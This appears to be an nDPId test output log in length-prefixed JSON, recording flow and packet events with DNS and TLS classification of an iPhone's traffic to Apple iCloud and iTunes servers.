00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599740,"flow_last_seen":1582454599811,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599811,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454599740,"flow_last_seen":1582454599814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454599814,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599929,"flow_last_seen":1582454599929,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454599929,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1582454599929,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1582454599929,"pkt":"xiwDYGpkxGGLNYKpCABFAABDumIAAP8Re+TAqAIRwKgCAf43ADUALyJV0zQBAAABAAAAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"}
00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599929,"flow_last_seen":1582454599929,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454599929,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1582454599930,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1582454599930,"pkt":"xGGLNYKpxiwDYGpkCABFAADjtQsAAEARP5zAqAIBwKgCEQA1\/jcAz3eX0zSBgAABAAUAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAMOwAmCHBsYXktY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAAAOmACIEcGxheQZpdHVuZXMFYXBwbGUDY29tCWVkZ2VzdWl0ZcBUwGUABQABAAAAXgAUBWExODA2BGRzY2IGYWthbWFpwFTAkwABAAEAAAAOAARce00awJMAAQABAAAADgAEXHtNQA=="}
00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":340,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599929,"flow_last_seen":1582454599930,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454599930,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.123.77.26"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599934,"flow_last_seen":1582454599934,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1582454599934,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599934,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGzmnAqAIRXHtNGsWbAbupO4D5AAAAALDC\/\/\/ZMQAAAgQFtAEDAwcBAQgKEd\/tTwAAAAAEAgAA"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1582454599967,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599967,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGGW5ce00awKgCEQG7xZtUZWomqTuA+qBScSDQrwAAAgQFrAQCCAozMbcgEd\/tTwEDAwc="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1582454600080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454600080,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGznXAqAIRXHtNGsWbAbupO4D6VGVqJ4AQBAtsOAAAAQEIChHf7eAzMbcg"}
00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599934,"flow_last_seen":1582454600080,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454600080,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":364,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599934,"flow_last_seen":1582454600116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454600116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599934,"flow_last_seen":1582454599934,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1582454599934,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599934,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGzmnAqAIRXHtNGsWbAbupO4D5AAAAALDC\/\/\/ZMQAAAgQFtAEDAwcBAQgKEd\/tTwAAAAAEAgAA"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1582454599967,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599967,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGGW5ce00awKgCEQG7xZtUZWomqTuA+qBScSDQrwAAAgQFrAQCCAozMbcgEd\/tTwEDAwc="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1582454600080,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454600080,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGznXAqAIRXHtNGsWbAbupO4D6VGVqJ4AQBAtsOAAAAQEIChHf7eAzMbcg"}
00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599934,"flow_last_seen":1582454600080,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454600080,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":364,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599934,"flow_last_seen":1582454600116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454600116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600454,"flow_last_seen":1582454600454,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454600454,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1582454600454,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1582454600454,"pkt":"xiwDYGpkxGGLNYKpCABFAABDtJ8AAP8RgafAqAIRwKgCAfi9ADUAL+BtI4YBAAABAAAAAAAABHN5bmMGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"}
00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600454,"flow_last_seen":1582454600454,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454600454,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"sync.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1582454600494,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1582454600494,"pkt":"xGGLNYKpxiwDYGpkCABFAADQcdgAAEARguLAqAIBwKgCEQA1+L0AvB7yI4aBgAABAAQAAAAABHN5bmMGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAF1gAmCHN5bmMtY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAAAWqABsGaXR1bmVzBWFwcGxlA2NvbQdlZGdla2V5wFTAZQAFAAEAABGWABgEZTY3MwVkc2NlOQpha2FtYWllZGdlwFTAjAABAAEAAAAYAARfZRg1"}
00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":422,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454600454,"flow_last_seen":1582454600494,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600494,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"sync.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600508,"flow_last_seen":1582454600508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454600508,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1582454600508,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454600508,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAGXAqAIRX2UYNcWcAbsi3fgeAAAAALDC\/\/8YLgAAAgQFtAEDAwcBAQgKEd\/vhgAAAAAEAgAA"}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1582454600541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454600541,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGS2lfZRg1wKgCEQG7xZzFmLU\/It34H6BScSB2MAAAAgQFrAQCCAqI0z6tEd\/vhgEDAwc="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1582454600545,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454600545,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAHHAqAIRX2UYNcWcAbsi3fgfxZi1QIAQBAsSJAAAAQEIChHf76yI0z6t"}
00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454600508,"flow_last_seen":1582454600545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454600545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":432,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454600508,"flow_last_seen":1582454600580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454600580,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1582454598252,"flow_last_seen":1582454599058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12558,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}}
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1582454598587,"flow_last_seen":1582454600617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10875,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}}
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1582454598721,"flow_last_seen":1582454600748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":73228,"flow_avg_l4_payload_len":951,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454599225,"flow_last_seen":1582454600287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7909,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}}
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454599740,"flow_last_seen":1582454600279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7913,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600508,"flow_last_seen":1582454600508,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454600508,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1582454600508,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454600508,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAGXAqAIRX2UYNcWcAbsi3fgeAAAAALDC\/\/8YLgAAAgQFtAEDAwcBAQgKEd\/vhgAAAAAEAgAA"}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1582454600541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454600541,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGS2lfZRg1wKgCEQG7xZzFmLU\/It34H6BScSB2MAAAAgQFrAQCCAqI0z6tEd\/vhgEDAwc="}
